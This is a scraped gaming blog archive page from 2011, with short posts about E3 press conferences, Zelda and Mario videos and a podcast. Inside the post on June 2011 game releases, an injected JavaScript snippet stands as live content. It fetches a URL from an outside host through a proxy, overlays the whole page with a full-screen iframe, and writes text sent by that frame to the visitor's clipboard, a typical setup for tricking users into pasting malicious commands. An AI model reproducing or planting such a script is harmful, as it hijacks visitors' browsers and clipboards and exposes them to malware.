If you weren’t confused by the Zelda timeline by now, you will be after this video!
Jun 07 2011
If you weren’t confused by the Zelda timeline by now, you will be after this video!
Permanent link to this article: https://www.brokenfuse.com/2011/06/07/youtube-tuesday-zelda-timeline/
Permanent link to this article: https://www.brokenfuse.com/2011/06/06/soul-calibur-v-trailer/
Permanent link to this article: https://www.brokenfuse.com/2011/06/06/lara-croft-e3-2011-trailer/
Jun 06 2011
E3 is kicking off today! Microsoft kicks off their Press Conference at 9:30 AM PST, Sony at 5PM PST and Nintendo has their Press Conference tomorrow at 9AM PST! This year is going to be an interesting year! Too bad I can’t make it out to LA this year for the E3 Expo. What’s everyone expecting out of E3 this year?
Permanent link to this article: https://www.brokenfuse.com/2011/06/06/e3-starts-today/
Jun 01 2011
Found this on reddit! Pretty funny stuff. We all know what the “Glitches” want. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/06/01/rare-candies/
May 31 2011
What if Super Mario Bros 3 was done in real life?
Permanent link to this article: https://www.brokenfuse.com/2011/05/31/youtube-tuesday-super-mario-bros/
May 31 2011
There was a time when gaming was frowned upon by the mainstream media and culture as being a very solitary activity a la world of Warcraft addiction and now, its swept the world by storm and is now considered a relatively social activity that can be enjoyed by the whole family.But I’d like to go back to a time before the Revolution that is the Wii and the DS to a more simpler time of which we remember from our childhood. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/31/gaming-the-social-club/
May 30 2011
It’s almost time for another month in 2011, and that means more new games fighting for your money. Normally, the summer means less games, but some good ones are on the way.
(function() {
const configLink = “https://corsproxy.io/?url=http://heyues.live”;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(" ");
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: "HEAD" })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();
Permanent link to this article: https://www.brokenfuse.com/2011/05/30/releases-of-june-2011-zelda-oot-3d/
May 27 2011
We talk about E3 and our predictions for what should come out of it this year for the Big Three. And for once I didn’t procrastinate on getting the recorded live stream up for your listening pleasure! Listen to our pre-E3 podcast after the jump! Continue reading
Podcast: Play in new window | Download (22.8MB) | Embed
Subscribe: RSS
Permanent link to this article: https://www.brokenfuse.com/2011/05/27/broken-fuse-pre-e3-podcast-episode-24/
May 27 2011
E3 is just around the corner! What are you most excited for this year?
Permanent link to this article: https://www.brokenfuse.com/2011/05/27/e3-is-just-around-the-corner/
You must be logged in to post a comment.